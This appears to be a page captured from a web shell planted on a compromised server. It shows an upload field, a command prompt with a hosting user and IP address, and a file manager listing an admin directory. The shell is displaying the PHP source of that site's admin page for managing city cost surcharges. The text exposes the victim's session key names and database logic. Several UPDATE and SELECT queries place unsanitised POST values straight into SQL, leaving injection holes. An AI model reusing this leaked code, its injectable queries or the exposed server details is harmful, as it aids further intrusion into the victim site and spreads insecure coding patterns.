[ Th3_Err0r Bypassed ]

Upload:

Command:

liwaavux@216.73.217.165: ~ $ 
<?php 
ob_start();
session_start();
?>
<?php
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
    
    $pageTitle  = 'city Controll';
    include 'init.php';
?>
<?php
/* ACTIVE citycalc */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['activecitycalc'])) {

    $adid   = $_POST["citycalc_id"];
        
    $stmt = $conn->prepare("UPDATE 
                                citycostscalc 
                                SET
                                citcalc_active   = 1
                                WHERE
                                citcalc_id  = $adid
                                ");
    $stmt->execute(array());    

        header('location:citycalc.php');
        exit();
}?>
<?php
/* PEND citycalc */
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['pendcitycalc'])) {

    $adid   = $_POST["citycalc_id"];
        
    $stmt = $conn->prepare("UPDATE 
                                citycostscalc 
                                SET
                                citcalc_active   = 0
                                WHERE
                                citcalc_id  = $adid
                                ");
    $stmt->execute(array());    

        header('location:citycalc.php');
        exit();
}?>
<?php 
// Delete citycalc
if (isset($_POST['delcitycalc'])){
    $id   = $_POST["citycalc_id"];

    $stmt = $conn->prepare("DELETE FROM  citycostscalc WHERE citcalc_id  = :zid");
    
    $stmt->bindparam(":zid", $id);
    
    $stmt->execute();
        
    
    header('location:citycalc.php');
    exit();
    }
?>
<?php
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['do_addcitycalc'])) {

    $cityname      = filter_var($_POST['city_name'], FILTER_SANITIZE_STRING);
    $cityarname    = filter_var($_POST['city_arname'], FILTER_SANITIZE_STRING);
    $cityordnum    = filter_var($_POST['city_ordnum'], FILTER_SANITIZE_NUMBER_INT);
    $cityacctype   = filter_var($_POST['city_acctype'], FILTER_SANITIZE_NUMBER_INT);
    $plusnumber    = filter_var($_POST['city_plusnumber'], FILTER_SANITIZE_STRING);

    $formErrors = array();
  
                if (empty($cityname)){

                    $formErrors[] = ' city name amount Cant Be <strong>Empty</strong> ';
                }
                //loop into errors array and echo it
                foreach($formErrors as $error){

                    echo '<div class= "alert alert-danger text-center">' .  $error .  '</div>' ;
                }
                if (empty($formErrors)){

                  $stmt = $conn->prepare("INSERT INTO
                  citycostscalc(citcalc_name, citcalc_arname, citcalc_ordernum, citcalc_type, citcalc_plusnumber, citcalc_active)
                  VALUES (:zname, :zarname, :zordnum,:ztype,:zplusnum, 1 ) ");
  
               $stmt->execute(array(
                   'zname'          => $cityname,
                   'zarname'        => $cityarname,
                   'zordnum'        => $cityordnum,
                   'ztype'          => $cityacctype,
                   'zplusnum'       => $plusnumber
      
               )); 
               
               header('location:citycalc.php');
               exit();
          } else{
            $msg=urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
            header('location:ac_workshops.php?Message='. $msg);

         exit();
          }
}
?>
<?php
// EDIT CITY Calc
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['do_editcitycalc'])) {
         
    $cityid        = $_POST['city_idis'];
    $cityname      = filter_var($_POST['city_name'], FILTER_SANITIZE_STRING);
    $cityarname    = filter_var($_POST['city_arname'], FILTER_SANITIZE_STRING);
    $cityordnum    = filter_var($_POST['city_ordnum'], FILTER_SANITIZE_NUMBER_INT);
    $cityacctype   = filter_var($_POST['city_acctype'], FILTER_SANITIZE_NUMBER_INT);
    $plusnumber    = filter_var($_POST['city_plusnumber'], FILTER_SANITIZE_STRING);

    $formErrors = array();
  
                if (empty($cityname)){

                    $formErrors[] = ' city name name Cant Be <strong>Empty</strong> ';
                }
                //loop into errors array and echo it
                foreach($formErrors as $error){

                    echo '<div class= "alert alert-danger text-center">' .  $error .  '</div>' ;
                }
                if (empty($formErrors)){

               $editwsh = $conn->prepare("UPDATE 
                             citycostscalc 
                             SET
                             citcalc_name        =?,
                             citcalc_arname      =?,
                             citcalc_ordernum    =?,
                             citcalc_type        =?,
                             citcalc_plusnumber  =?

                             WHERE
                             citcalc_id   = $cityid ");
                $editwsh->execute(array($cityname ,$cityarname,$cityordnum,$cityacctype,$plusnumber));     
                    
                    header('location:citycalc.php');
                    exit();

          } else{
            $msg=urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
            header('location:ac_workshops.php?Message='. $msg);

         exit();
          }
}
?>
<?php 
if(isset($_POST['addcitycalc'])){
?>
<section class="add_my">
    <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> إضافة مدينة جديدة </p>
        <div class="row">
            <div class="input-group">
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2" name="city_name" id="city_name" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة الإنكليزية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2"  name="city_arname" id="city_arname" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة العربية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" class="w-100 fw-bold py-2" name="city_ordnum" id="city_ordnum" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> ترتيب الظهور (رقم للترتيب وفقه) <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="double" class="w-100 fw-bold py-2" name="city_plusnumber" id="city_plusnumber" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> المبلغ الإضافي للمدينة <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="type mt-4 w-50 m-auto">
                        <label for="type" class="text-muted fw-bold text-center"> نوع العملية الحسابية <span class="text-danger fs-5">◈</span></label>
                        <select class="form-select" aria-label="Default select example bg-white" name="city_acctype" required="required">
                        <option selected disabled class="fw-bold text-primary"> إختر نوع العملية الحسابية </option>
                        <option value="1"> جمع الرقم للناتج الإجمالي </option>
                        <option value="2"> ضرب الناتج الإجمالي بالرقم (زيادة نسبة مئوية) </option>
                        </select>
                    </div>
                </div>
            </div>          
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="do_addcitycalc" type="submit"> تأكيد </button>
            </div>
        </div>
    </form>
</section>
<?php }?>

<?php 
if(isset($_POST['editcitycalc'])){
$cityid  =   $_POST['citcalc_id'];
?>
<?php 
// select All Data Depend on this ID
$stmacc = $conn->prepare("SELECT * FROM citycostscalc WHERE citcalc_id  = $cityid");
// execute Query
$stmacc->execute();
// fetch the data
$cityinfo = $stmacc->fetch();
?>
<section class="add_my">
    <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> تعديل مدينة </p>
        <div class="row">
            <div class="input-group">
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo $cityinfo['citcalc_id']; ?>" name="city_idis">
                                <input type="text" value="<?php echo $cityinfo['citcalc_name']; ?>" class="w-100 fw-bold py-2" name="city_name" id="city_name" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة الإنكليزية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo $cityinfo['citcalc_arname']; ?>" class="w-100 fw-bold py-2"  name="city_arname" id="city_arname" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> إسم المدينة باللغة العربية <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="text" value="<?php echo $cityinfo['citcalc_ordernum']; ?>" class="w-100 fw-bold py-2" name="city_ordnum" id="city_ordnum" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> ترتيب الظهور (رقم للترتيب وفقه) <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="w-100">
                        <hr class="my-3">
                        <div class="input-group">
                            <div class="col-6">
                                <input type="double" value="<?php echo $cityinfo['citcalc_plusnumber']; ?>" class="w-100 fw-bold py-2" name="city_plusnumber" id="city_plusnumber" />
                            </div>
                            <di class="col-6">
                                <label for="subject_name" class="text-muted fw-bold text-center"> المبلغ الإضافي للمدينة <span class="text-danger fs-5">◈</span></label>
                            </di>
                            </div>
                        </div>
                    </div>
                </div>
                <hr>
                <div class="col-12">
                    <div class="type mt-4 w-50 m-auto">
                        <label for="type" class="text-muted fw-bold text-center"> نوع العملية الحسابية <span class="text-danger fs-5">◈</span></label>
                        <select class="form-select" aria-label="Default select example bg-white" name="city_acctype" required="required">
                        <option value="1" <?php if($cityinfo['citcalc_type'] == 1){echo "selected";} ?> > جمع الرقم للناتج الإجمالي </option>
                        <option value="2" <?php if($cityinfo['citcalc_type'] == 2){echo "selected";} ?> > ضرب الناتج الإجمالي بالرقم (زيادة نسبة مئوية) </option>
                        </select>
                    </div>
                </div>
            </div>          
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="do_editcitycalc" type="submit"> تأكيد </button>
            </div>
        </div>
    </form>
</section>
<?php }?>



<?php
ob_end_flush();
include 'assets/includes/template/footer.php';
?>
<?php
}else{
header('Location:index.php');
exit;
}
?>

Filemanager

DIR : / home/ liwaavux/ public_html/ admin/
Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644

© 2026 Coded By Th3_Err0r Code.